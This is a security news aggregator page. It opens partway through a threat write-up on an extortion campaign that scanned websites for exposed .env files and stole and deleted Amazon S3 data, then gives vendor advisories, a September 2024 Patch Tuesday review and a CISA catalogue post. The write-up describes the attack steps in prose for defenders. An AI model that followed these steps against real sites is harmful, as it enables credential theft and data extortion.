function’s Amazon CloudWatch logging is always enabled by default, and attackers cannot disable it.Step 9 — Fetch potential target domains to compromise: The malicious lambda function accessed the attackers’ controlled S3 bucket to fetch a list of potential target domains to scan and attempt to compromise.Step 10 — Scan for credentials stored in exploitable .env files: For each <domain>, the malicious lambda function attempted to retrieve sensitive secrets from .env files by accessing http[s]://<domain>/.env, reading the contents of the .env file if the web server was misconfigured.Step 11 — Store sensitive credentials in the controlled AWS S3 bucket: If the malicious lambda function retrieved a domain’s exposed .env file, it parsed the file contents to extract sensitive credentials, and then stored those credentials in a dedicated folder within the controlled AWS S3 bucket.Phase 5: Data ExfiltrationUsing the compromised credentials, the attackers proceeded to exfiltrate and extort sensitive data from Amazon S3 buckets. Their data exfiltration involved unauthorized extraction and removal of data from these storage instances.The threat actors accessed S3 buckets within the compromised accounts and used the S3 Browser tool to interact with the S3 API for data extraction. After downloading all the files, they deleted them and left a ransom note, informing the owner that their sensitive information was now in the attackers’ possession and would be sold unless a ransom was paid.Appendix B — Moving S3 Objects Between AccountsStep 12 — Move S3 Objects Between S3 Buckets Across AWS Accounts: The S3 Browser tool enables transferring data from a source S3 bucket in one AWS account to a destination S3 bucket in another AWS account, whether in the same AWS region or a different one. To do this, the source S3 bucket must grant IAM access through an attached resource policy. An IAM user in the destination account needs to assume a role with GetObject and DeleteObject permissions for the source bucket. Finally, attackers could use the S3 mv command to transfer data from the source S3 bucket to the destination S3 bucket.NOTE: The S3 Browser tool generates various S3 API calls during its use, which can reveal the S3 buckets accessed by the attackers, regardless of whether S3 object-level logging was enabled.EpilogueIn the next blog post, I will explain how organizations can proactively detect and remediate these kinds of attacks, and how to remain protected and safe. Stay tuned!If you have any questions, comments, or feedback, send me a message — I’d be happy to discuss. Additionally, if you found this article useful and wish to stay updated on future research, feel free to follow me here. :)Large-Scale Data Exfiltration: Exploiting Secrets in .env Files to Compromise Cloud Accounts was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

Check Point Software has been named a Leader in GigaOm’s latest Radar Report for Security Policy as Code. Check Point’s CloudGuard, part of the Infinity Platform, offers comprehensive code security capabilities designed to help businesses defend against the ever-changing landscape of cyber threats. “At Check Point, we recognise the challenges in safeguarding digital assets in […] The post Check Point Software Recognised as a Leader in GigaOm Radar Report for Security Policy as Code appeared first on IT Security Guru.

by IT Security Guru

With its Xanadu release, ServiceNow expands its Now Platform with more automation and AI-driven capabilities.

by ITPro Today

An attack dubbed "WordDrone" that uses an old flaw to install a backdoor could be related to previously reported cyber incidents against Taiwan''s military and satellite industrial supply chain.

by Dark Reading

As the volume and complexity of vulnerabilities grows, organizations are struggling to manage and mitigate the security defects. 

by Cybersecurity Dive

We detail a rare phishing mechanism using a refresh entry in the HTTP response header for stealth redirects to malicious pages, affecting finance and government sectors. The post Phishing Pages Delivered Through Refresh HTTP Response Header appeared first on Unit 42.

by Palo Alto Networks - Unit42

This week, Cato Networks, global SASE provider, announced the following appointments to the company’s Board of Directors, effective October 1, 2024. – Eyal Waldman, chairman of Waldo Holdings and former CEO of Mellanox Technologies – Gili Iohan, general partner at ION Crossover Partners and former CFO of Varonis “We welcome Eyal and Gili as new […] The post Cato Networks Expands Board of Directors with Two Industry Leaders appeared first on IT Security Guru.

by IT Security Guru

by ComputerWeekly

by ComputerWeekly

As attacks on satellites rise with nation-state conflicts, the South Asian nation joins other space-capable countries in doubling down on cybersecurity.

by Dark Reading

ISC2’s annual report draws some troubling conclusions for the state of cyber defense. Budget cuts, layoffs and hiring freezes are exacerbating a global staffing shortage.

by Cybersecurity Dive

This vulnerability allows local attackers to escalate privileges on affected installations of Ivanti Workspace Control. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-8012.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-34785.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-34783.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-34779.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-32848.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-32846.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-32845.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-32843.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-32842.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-32840.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Ivanti Endpoint Manager. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.2. The following CVEs are assigned: CVE-2024-37397.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. Alternatively, no user interaction is required if the attacker has administrative credentials to the application. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-8191.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to bypass the SmartScreen security feature on affected installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2024-38213.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to bypass the SmartScreen security feature to execute arbitrary code on affected installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2024-38213.

by Zero Day Initiative Advisories

This vulnerability allows physically present attackers to execute arbitrary code on affected installations of Visteon Infotainment system. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.8. The following CVEs are assigned: CVE-2024-8355.

by Zero Day Initiative Advisories

The combination of immutability, indelibility, centralized governance, and user empowerment provides a comprehensive backup strategy, Google said.

by Dark Reading

Learn about Mitiga’s fully-managed cloud detection and response service that operates 24/7.

by Mitiga

Wiz Code identifies and flags cloud risks in code to help improve collaboration between security and development teams.

by Dark Reading

Microsoft Corp. today released updates to fix at least 79 security vulnerabilities in its Windows operating systems and related software, including multiple flaws that are already showing up in active attacks. Microsoft also corrected a critical bug that has caused some Windows 10 PCs to remain dangerously unpatched against actively exploited vulnerabilities for several months this year.

by Krebs on Security

The threat actor known as CosmicBeetle has debuted a new custom ransomware strain called ScRansom in attacks targeting small- and medium-sized businesses (SMBs) in Europe, Asia, Africa, and South America, while also likely working as an affiliate for RansomHub. ""CosmicBeetle replaced its previously deployed ransomware, Scarab, with ScRansom, which is continually improved,"" ESET researcher Jakub

by The Hacker News

This month''s Patch Tuesday contains a total of 79 vulnerabilities — the fourth largest of the year.

by Dark Reading

In this case study, a 180-year-old life and pension insurer brought its security infrastructure into the modern age.

by Dark Reading

AttackIQ has released a new assessment template in response to the CISA Advisory (AA24-249A) published on September 5, 2024, that assesses cyber actors affiliated with the Russian General Staff Main Intelligence Directorate (GRU) 161st Specialist Training Center (Unit 29155), who are responsible for computer network operations against global targets for the purposes of espionage, sabotage, and reputational harm since at least 2020. The post Response to CISA Advisory (AA24-249A): Russian Military Cyber Actors Target US and Global Critical Infrastructure appeared first on AttackIQ.

by AttackIQ

A recent breach involved nearly 3 billion personal records and included many Social Security numbers. Was yours one of them? Here''s how to check and what to do to protect yourself.

by ZDNET Security

September’s monthly round of patches from Microsoft included 79 vulnerabilities, seven of which are considered critical.

by Cisco Talos Blog

Traditional RAG links LLMs with enterprise data to enhance AI outcomes. Agentic RAG improves on this by employing intelligent agents to process complex queries across multiple sources.

by ITPro Today

How to make the most of the new features in Sophos Firewall v21

by Sophos News

Besides operational issues connected to a talent shortage, the cost of running security platforms — and their training costs — also keeps CISOs up at night.

by Dark Reading

The London transport authority removes a claim that said there was no evidence that customer data was compromised during a recent hack. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

We’ve reached September and the pumpkin spice floats in the air. While they aren’t pumpkin-spiced, Microsoft and Adobe have released their latest spicy security patches – including some zesty 0-days. Take a break from your regular activities and join us as we review the details of their latest security alerts.If you’d rather watch the full video recap covering the entire release, you can check it out here: Adobe Patches for September 2024For September, Adobe released eight bulletins covering 28 CVEs in Adobe Acrobat and Reader, ColdFusion, Photoshop, Media Encoder, Audition, After Effects, Premier Pro, and Illustrator. A total of seven of these bugs came through the ZDI program. If you’re prioritizing, I would look at the ColdFusion patch first. It corrects a single code execution bug rated at CVSS 9.8. It’s unusual to see patches for Acrobat and Reader in back-to-back months, but I guess these two Critical-rated bugs were late for last month’s release. The fix for Photoshop fixes five CVEs, four of which are rated Critical. The Illustrator patch fixes six bugs, with four of those being Critical code execution bugsThe update for Premier Pro fixes one Critical and one Moderate bug. The fix for After Effects covers five bugs, including two from ZDI researcher Mat Powell. He’s also responsible for the Critical-rated bug in Audition. The final patch from Adobe covers five bugs in Media Encoder, two of which are rated Critical.None of the bugs fixed by Adobe this month are listed as publicly known or under active attack at the time of release. Adobe categorizes these updates as a deployment priority rating of 3.Microsoft Patches for September 2024This month, Microsoft released 79 new CVEs in Windows and Windows Components; Office and Office Components; Azure; Dynamics Business Central; SQL Server; Windows Hyper-V; Mark of the Web (MOTW); and the Remote Desktop Licensing Service. Four of these vulnerabilities were reported through the ZDI program.Of the patches being released today, seven are rated Critical, 71 are rated Important, and one is rated Moderate in severity. The size of this release tracks with the volume we saw from Redmond last month, but again, it’s unusual to see such a high number of bugs under active attack.One of these CVEs is listed as publicly known, and four others are listed as under active attack at the time of release. However, we at the ZDI think that number should be five. More on that later. Let’s take a closer look at some of the more interesting updates for this month, starting with the vulnerabilities currently being exploited:CVE-2024-43491 - Microsoft Windows Update Remote Code Execution VulnerabilityThis is an unusual bug. At first, it reads like a downgrade attack similar to the one discussed at Black Hat. However, it appears that this downgrade was introduced through updates to the Servicing Stack affecting Optional Components on Windows 10 systems. Admins will need to install both the servicing stack update (KB5043936) AND this security update (KB5043083) to fully address the vulnerability. It’s also interesting to note that while this particular bug isn’t being exploited in the wild, it allowed some of those Optional Components to be exploited. The only good news here is that only a portion of Windows 10 systems are affected. Check the write-up from Microsoft to see if you’re impacted, then test and deploy these updates quickly.CVE-2024-38226 - Microsoft Publisher Security Features Bypass Vulnerability  I’m always amazed by the ingenuity of attackers, be they red teamers or threat actors. Who would have thought to exploit macros in Microsoft Publisher? I had forgotten all about that program. But here we are. The attack involves specially crafted files being opened by affected Publisher versions. Obviously, an attacker would need to convince a target to open the file, but if they do, it will bypass Office macro policies and execute code on the target system.CVE-2024-38217 - Windows Mark of the Web Security Feature Bypass VulnerabilityWe’ve talked a lot about MoTW bypasses over the last several months, but it seems like there’s always more to say. This is one of two MoTW bypasses receiving fixes this month, but only this one is listed as under attack. Microsoft provides no details about the attacks, but in the past, MoTW bypasses have been associated with ransomware gangs targeting crypto traders. This bug is also listed as publicly known, but no information is provided about that detail either.CVE-2024-38014 - Windows Installer Elevation of Privilege Vulnerability  Here’s yet another privilege escalation bug that leads to SYSTEM being exploited in the wild. And not conjure Xzibit memes, but I think it’s great when attackers put an extra installer in the Installer. Interestingly, Microsoft states that no user interaction is required for this bug, so the actual mechanics of the exploit may be odd. Still, privilege escalations like this are typically paired with a code execution bug to take over a system. Test and deploy this fix quickly.CVE-2024-43461 - Windows MSHTML Platform Spoofing VulnerabilityThis bug is similar to the vulnerability we reported and was patched back in July. The ZDI Threat Hunting team discovered this exploit in the wild and reported it to Microsoft back in June. It appears threat actors quickly bypassed the previous patch. When we told Microsoft about the bug, we indicated it was being actively used. We’re not sure why they don’t list it as being under active attack, but you should treat it as though it were, especially since it affects all supported versions of Windows.Here’s the full list of CVEs released by Microsoft for September 2024: CVE Title Severity CVSS Public Exploited XI Type CVE-2024-38217 Windows Mark of the Web Security Feature Bypass Vulnerability Important 5.4 Yes Yes 0 SFB CVE-2024-43491 † Microsoft Windows Update Remote Code Execution Vulnerability Critical 9.8 No Yes 0 RCE CVE-2024-38226 Microsoft Publisher Security Features Bypass Vulnerability Important 7.3 No Yes 0 SFB CVE-2024-38014 Windows Installer Elevation of Privilege Vulnerability Important 7.8 No Yes 0 EoP CVE-2024-43461 Windows MSHTML Platform Spoofing Vulnerability Important 8.8 No Disputed 1 Spoofing CVE-2024-38216 Azure Stack Hub Elevation of Privilege Vulnerability Critical 8.2 No No 2 EoP CVE-2024-38220 Azure Stack Hub Elevation of Privilege Vulnerability Critical 9 No No 2 EoP CVE-2024-38194 Azure Web Apps Elevation of Privilege Vulnerability Critical 8.4 No No 2 EoP CVE-2024-38018 Microsoft SharePoint Server Remote Code Execution Vulnerability Critical 8.8 No No 1 RCE CVE-2024-43464 Microsoft SharePoint Server Remote Code Execution Vulnerability Critical 7.2 No No 1 RCE CVE-2024-38119 Windows Network Address Translation (NAT) Remote Code Execution Vulnerability Critical 7.5 No No 2 RCE CVE-2024-43469 Azure CycleCloud Remote Code Execution Vulnerability Important 8.8 No No 2 RCE CVE-2024-38188 Azure Network Watcher VM Agent Elevation of Privilege Vulnerability Important 7.1 No No 2 EoP CVE-2024-43470 Azure Network Watcher VM Agent Elevation of Privilege Vulnerability Important 7.3 No No 2 EoP CVE-2024-38236 DHCP Server Service Denial of Service Vulnerability Important 7.5 No No 2 DoS CVE-2024-38238 Kernel Streaming Service Driver Elevation of Privilege Vulnerability Important 7.8 No No 1 EoP CVE-2024-38241 Kernel Streaming Service Driver Elevation of Privilege Vulnerability Important 7.8 No No 1 EoP CVE-2024-38242 Kernel Streaming Service Driver Elevation of Privilege Vulnerability Important 7.8 No No 1 EoP CVE-2024-38243 Kernel Streaming Service Driver Elevation of Privilege Vulnerability Important 7.8 No No 1 EoP CVE-2024-38244 Kernel Streaming Service Driver Elevation of Privilege Vulnerability Important 7.8 No No 1 EoP CVE-2024-38245 Kernel Streaming Service Driver Elevation of Privilege Vulnerability Important 7.8 No No 1 EoP CVE-2024-38237 Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability Important 7.8 No No 1 EoP CVE-2024-38257 Microsoft AllJoyn API Information Disclosure Vulnerability Important 7.5 No No 2 Info CVE-2024-43492 Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability Important 7.8 No No 2 EoP CVE-2024-43476 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability Important 7.6 No No 2 XSS CVE-2024-38225 Microsoft Dynamics 365 Business Central Elevation of Privilege Vulnerability Important 8.8 No No 2 EoP CVE-2024-43465 Microsoft Excel Elevation of Privilege Vulnerability Important 7.8 No No 2 EoP CVE-2024-38259 Microsoft Management Console Remote Code Execution Vulnerability Important 8.8 No No 2 RCE CVE-2024-43463 Microsoft Office Visio Remote Code Execution Vulnerability Important 7.8 No No 2 RCE CVE-2024-43482 † Microsoft Outlook for iOS Information Disclosure Vulnerability Important 6.5 No No 2 Info CVE-2024-43479 † Microsoft Power Automate Desktop Remote Code Execution Vulnerability Important 8.5 No No 2 RCE CVE-2024-43466 Microsoft SharePoint Server Denial of Service Vulnerability Important 6.5 No No 2 DoS CVE-2024-38227 Microsoft SharePoint Server Remote Code Execution Vulnerability Important 7.2 No No 1 RCE CVE-2024-38228 Microsoft SharePoint Server Remote Code Execution Vulnerability Important 7.2 No No 1 RCE CVE-2024-37341 † Microsoft SQL Server Elevation of Privilege Vulnerability Important 8.8 No No 2 EoP CVE-2024-37965 † Microsoft SQL Server Elevation of Privilege Vulnerability Important 8.8 No No 2 EoP CVE-2024-37980 † Microsoft SQL Server Elevation of Privilege Vulnerability Important 8.8 No No 2 EoP CVE-2024-43474 Microsoft SQL Server Information Disclosure Vulnerability Important 7.6 No No 2 Info CVE-2024-37337 Microsoft SQL Server Native Scoring Information Disclosure Vulnerability Important 7.1 No No 2 Info CVE-2024-37342 Microsoft SQL Server Native Scoring Information Disclosure Vulnerability Important 7.1 No No 2 Info CVE-2024-37966 Microsoft SQL Server Native Scoring Information Disclosure Vulnerability Important 7.1 No No 2 Info CVE-2024-26186 † Microsoft SQL Server Native Scoring Remote Code Execution Vulnerability Important 8.8 No No 2 RCE CVE-2024-26191 † Microsoft SQL Server Native Scoring Remote Code Execution Vulnerability Important 8.8 No No 2 RCE CVE-2024-37335 † Microsoft SQL Server Native Scoring Remote Code Execution Vulnerability Important 8.8 No No 2 RCE CVE-2024-37338 † Microsoft SQL Server Native Scoring Remote Code Execution Vulnerability Important 8.8 No No 2 RCE CVE-2024-37339 † Microsoft SQL Server Native Scoring Remote Code Execution Vulnerability Important 8.8 No No 2 RCE CVE-2024-37340 † Microsoft SQL Server Native Scoring Remote Code Execution Vulnerability Important 8.8 No No 2 RCE CVE-2024-43475 Microsoft Windows Admin Center Information Disclosure Vulnerability Important 7.3 No No 2 Info CVE-2024-38046 PowerShell Elevation of Privilege Vulnerability Important 7.8 No No 2 EoP CVE-2024-38246 Win32k Elevation of Privilege Vulnerability Important 7 No No 1 EoP CVE-2024-38254 Windows Authentication Information Disclosure Vulnerability Important 5.5 No No 2 Info CVE-2024-38247 Windows Graphics Component Elevation of Privilege Vulnerability Important 7.8 No No 1 EoP CVE-2024-38249 Windows Graphics Component Elevation of Privilege Vulnerability Important 7.8 No No 1 EoP CVE-2024-38250 Windows Graphics Component Elevation of Privilege Vulnerability Important 7.8 No No 2 EoP CVE-2024-38235 Windows Hyper-V Denial of Service Vulnerability Important 6.5 No No 2 DoS CVE-2024-38239 Windows Kerberos Elevation of Privilege Vulnerability Important 7.2 No No 2 EoP CVE-2024-38256 Windows Kernel-Mode Driver Information Disclosure Vulnerability Important 5.5 No No 2 Info CVE-2024-43495 Windows libarchive Remote Code Execution Vulnerability Important 7.3 No No 2 RCE CVE-2024-38232 Windows Networking Denial of Service Vulnerability Important 7.5 No No 2 DoS CVE-2024-38233 Windows Networking Denial of Service Vulnerability Important 7.5 No No 2 DoS CVE-2024-38234 Windows Networking Denial of Service Vulnerability Important 6.5 No No 2 DoS CVE-2024-43458 Windows Networking Information Disclosure Vulnerability Important 7.7 No No 2 Info CVE-2024-38240 Windows Remote Access Connection Manager Elevation of Privilege Vulnerability Important 8.1 No No 2 EoP CVE-2024-38231 Windows Remote Desktop Licensing Service Denial of Service Vulnerability Important 6.5 No No 2 DoS CVE-2024-38258 Windows Remote Desktop Licensing Service Information Disclosure Vulnerability Important 6.5 No No 2 Info CVE-2024-38260 Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability Important 8.8 No No 2 RCE CVE-2024-38263 Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability Important 7.5 No No 2 RCE CVE-2024-43454 Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability Important 7.1 No No 2 RCE CVE-2024-43467 Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability Important 7.5 No No 2 RCE CVE-2024-43455 Windows Remote Desktop Licensing Service Spoofing Vulnerability Important 8.8 No No 2 Spoofing CVE-2024-30073 Windows Security Zone Mapping Security Feature Bypass Vulnerability Important 7.8 No No 2 SFB CVE-2024-43457 Windows Setup and Deployment Elevation of Privilege Vulnerability Important 7.8 No No 1 EoP CVE-2024-38230 Windows Standards-Based Storage Management Service Denial of Service Vulnerability Important 6.5 No No 2 DoS CVE-2024-38248 Windows Storage Elevation of Privilege Vulnerability Important 7 No No 2 EoP CVE-2024-21416 Windows TCP/IP Remote Code Execution Vulnerability Important 8.1 No No 2 RCE CVE-2024-38045 Windows TCP/IP Remote Code Execution Vulnerability Important 8.1 No No 2 RCE CVE-2024-38252 Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability Important 7.8 No No 1 EoP CVE-2024-38253 Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability Important 7.8 No No 1 EoP CVE-2024-43487 Windows Mark of the Web Security Feature Bypass Vulnerability Moderate 6.5 No No 1 SFB † Indicates further administrative actions are required to fully address the vulnerability.Moving on to the other Critical-rated bugs, the vulnerability in SharePoint stands out. It was discovered by ZDI researcher Piotr Bazydło and could lead to code execution in the context of the service account. The specific flaw exists within the handling of serialized instances of the SPThemes class. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. There’s another Critical fix for SharePoint, but it requires Site Owner permissions. There are two bugs in Azure Stack Hub that could allow an attacker to interact with other tenants’ applications and content. However, the threat actor would need the target to initiate a connection. There’s a bug in NAT that would allow unauthenticated code execution, but the attacker would need access to a restricted network first since NAT isn’t routable (in most cases). The final Critical bug has already been mitigated by Microsoft and is being publicly documented.Looking at the other code execution bugs, the two in TCP/IP stand out, especially considering the ugly bug in TCP fixed last month. However, these bugs require a non-default configuration, so they are less likely to have a big impact. For enterprises configured with NetNAT, test and deploy this update quickly. There are four code execution bugs in the Remote Desktop Licensing Service, but all require authentication. There are six fixes for SQL Server Native Scoring, and the exploit scenario here is interesting. According to Microsoft, exploitation “requires an authenticated attacker to leverage SQL Server Native Scoring to apply pre-trained models to their data without moving it out of the database.” The servicing scenario is also convoluted, as you may need to contact third-party vendors to verify apps are compatible with Microsoft OLE DB Driver 18 or 19. Read the bulletin, scratch your head, then read it again. Bugs like this one make me unreasonably angry when people say, “Just Patch.”The bug in Azure CycleCloud almost reads like a privilege escalation, as a basic user could make specially crafted requests to modify the configuration of an Azure CycleCloud cluster to gain root-level permissions. There are two other fixes for SharePoint, but they are listed as Important instead of Critical for some reason – despite looking suspiciously similar to the Critical-rated bugs. This fix for Power Automate Desktop is found in the Windows Store, so if you have disabled Store updates, you’ll need to apply this fix manually. The remaining RCE bugs are garden-variety open-and-own vulnerabilities.There are 30 fixes for Elevation of Privilege (EoP) bugs in this release including those already. Mentioned. However, most of these either lead to SYSTEM-level code execution or administrative privileges if an authenticated user runs specially crafted code. The bugs in SQL Server will have the same servicing problems as previously mentioned. Bottom line – it’s a bad month to be an SQL Server admin. The bug in PowerShell could allow a regular user to elevate to an unrestrained WDAC user.Beyond those already mentioned, there are two Security Feature Bypass (SFB) bugs receiving patches this month. Both involve web browsing. The first is in Windows Security Zone Mapping and could allow an attacker to craft a URL that would be interpreted as belonging to a more privileged zone. The other is another MoTW SmartScreen bypass. This one is not listed as public, but the technique is quite in vogue right now.The September release includes fixes for 11 different information disclosure bugs. Thankfully, most only result in info leaks consisting of unspecified memory contents. There are two exceptions. The bug in Remote Desktop Licensing Service could disclose the ever-ethereal “sensitive information”. The bug in Outlook for iOS would allow attackers to read “file content.” It’s not clear if that’s random file content or if the files can be specified by the attacker. Also, you’ll need to get this update from the App Store if you haven’t enabled automatic updates on your iOS device.In addition to the spoofing bug under active attack, there’s also a fix for a spoofing bug in the Windows Remote Desktop Licensing Service. Microsoft doesn’t specify what is being spoofed; only that an attacker must be able to send requests to the Terminal Server Licensing Service. This shouldn’t be reachable from the Internet, but now would be a fine time to verify that fact.The September release includes fixes for a handful of Denial-of-Service (DoS) bugs. However, Microsoft again provides little additional information about these vulnerabilities. There are some things we can see in the tea leaves. For example, one of the patches for Windows Networking notes that an unauthenticated attacker with LAN access can exploit this bug. However, the other patches for Windows Network list the attack vector as Network instead of Adjacent. I would still think the attacker would be unauthenticated. The DoS in the DHCP server would likely shut down the service, but again, it’s not clear if that’s a permanent or a temporary DoS. We do know the DoS in Hyper-V would allow an attacker on a guest OS to impact the functionality of the host OS.Finally, the release is rounded out by a single cross-site scripting (XSS) bug in Microsoft Dynamics (on-premises).There are no new advisories in this month’s release.Looking AheadThe next Patch Tuesday of 2024 will be on October 8, and I’ll return with details and spooky patch analysis then. Until then, stay safe, happy patching, and may all your reboots be smooth and clean!

by Zero Day Initiative Blog

A trio of threat activity clusters linked to China has been observed compromising more government organizations in Southeast Asia as part of a renewed state-sponsored operation codenamed Crimson Palace, indicating an expansion in the scope of the espionage effort. Cybersecurity firm Sophos, which has been monitoring the cyber offensive, said it comprises three intrusion sets tracked as Cluster

by The Hacker News

Shadow apps, a segment of Shadow IT, are SaaS applications purchased without the knowledge of the security team. While these applications may be legitimate, they operate within the blind spots of the corporate security team and expose the company to attackers.  Shadow apps may include instances of software that the company is already using. For example, a dev team may onboard their own

by The Hacker News

A subscription for Windows 10 Extended Security Updates will be shockingly expensive for businesses. For educators, the cost is just a few bucks. But what about consumers?

by ZDNET Security

Collaboration between offensive (Red Team) and defensive (Blue Team) operations is essential to fortify an organization’s defenses. During a recent SiegeCast session, Tim Medin (CEO of Red Siege), Justin Polk […]

by Red Siege Blog

A new side-channel attack dubbed PIXHELL could be abused to target air-gapped computers by breaching the ""audio gap"" and exfiltrating sensitive information by taking advantage of the noise generated by pixels on an LCD screen. ""Malware in the air-gap and audio-gap computers generates crafted pixel patterns that produce noise in the frequency range of 0 - 22 kHz,"" Dr. Mordechai Guri, the head of

by The Hacker News

A fresh wave of attacks on APAC government entities involves both self-propagating malware spreading via removable drives and a spear-phishing campaign.

by Dark Reading

The threat actor tracked as Mustang Panda has refined its malware arsenal to include new tools in order to facilitate data exfiltration and the deployment of next-stage payloads, according to new findings from Trend Micro. The cybersecurity firm, which is monitoring the activity cluster under the name Earth Preta, said it observed ""the propagation of PUBLOAD via a variant of the worm HIUPAN.""

by The Hacker News

Key Takeaways CISA has updated its Known Exploited Vulnerabilities (KEV) Catalog with three critical vulnerabilities: CVE-2016-3714, CVE-2017-1000253, and CVE-2024-40766. These vulnerabilities are being actively exploited by cybercriminals, posing significant risks to both federal and private sector organizations. CISA urges all organizations to prioritize the remediation of these vulnerabilities to strengthen their cybersecurity defenses. Organizations should update software with the latest patches, implement multi-factor authentication (MFA), and continuously monitor for unusual activities. For detailed information and support, organizations should consult CISA’s advisories and the relevant vendor resources. Overview The Cybersecurity and Infrastructure Security Agency (CISA) has recently updated its Known Exploited Vulnerabilities (KEV) Catalog by adding three new vulnerabilities. These newly identified flaws represent significant security risks and are actively being exploited by malicious actors. The newly added vulnerabilities include CVE-2016-3714, which affects ImageMagick due to improper input validation; CVE-2017-1000253, a Linux kernel vulnerability involving stack buffer corruption in position-independent executables (PIE); and CVE-2024-40766, a severe access control issue in SonicWall SonicOS. These vulnerabilities are known to be frequent targets for cyberattacks and present significant risks to both federal and private sector organizations. CISA urges all organizations to prioritize remediation of these vulnerabilities to enhance their cybersecurity posture. Details of the Vulnerabilities CVE-2016-3714, also known as ""ImageTragick,"" affects ImageMagick versions prior to 6.9.3-10 and 7.x before 7.0.1-1. This vulnerability arises from improper input validation, which impacts various coders within ImageMagick. Exploiting this flaw allows attackers to execute arbitrary code via shell metacharacters in a specially crafted image, potentially leading to remote code execution. To mitigate this risk, users should ensure that image files are validated for correct ""magic bytes"" and configure ImageMagick’s policy file to disable the vulnerable coders. Comprehensive guidance on configuration and additional mitigations is available for users. CVE-2017-1000253 affects multiple versions of the Linux kernel, including those used in RedHat Enterprise Linux and CentOS. This vulnerability involves stack buffer corruption in the load_elf_binary() function, which can be exploited by local attackers to escalate privileges through issues with position-independent executables (PIE). Users are advised to apply the available patches to correct this buffer corruption flaw. Further details and patches are provided for addressing this issue. CVE-2024-40766 is a critical vulnerability affecting SonicWall Firewalls Gen 5, Gen 6, and Gen 7 devices running SonicOS 7.0.1-5035 and older. This flaw in SonicWall SonicOS Management Access and SSLVPN allows unauthenticated attackers to gain unauthorized access to the management interface, which could result in unauthorized resource access or even firewall crashes. To mitigate this vulnerability, it is essential to restrict firewall management to trusted sources or disable WAN management and SSLVPN access from the Internet. Users should download and apply the latest patches from SonicWall’s official site, and detailed security measures and patch links are available for further guidance. Conclusion The addition of CVE-2016-3714, CVE-2017-1000253, and CVE-2024-40766 to CISA’s KEV Catalog highlights the critical nature of these vulnerabilities. Organizations must act promptly to address these issues by applying patches and implementing recommended security practices. For additional information and support, refer to the official advisories and technical resources provided by CISA and relevant vendors. Mitigation and Recommendations Ensure all software, firmware, and systems are updated with the latest patches. Restrict access to critical systems to authorized users only and implement multi-factor authentication (MFA). Continuously monitor systems for unusual activities and conduct regular security audits and vulnerability assessments. Maintain and regularly update an incident response plan to manage potential security breaches effectively. Develop a comprehensive strategy for patch management, including inventory, assessment, testing, and deployment. Implement proper network segmentation to protect critical assets from internet exposure. The post CISA Adds Three Critical Vulnerabilities to Known Exploited Vulnerabilities Catalog appeared first on Cyble.

by CYBLE

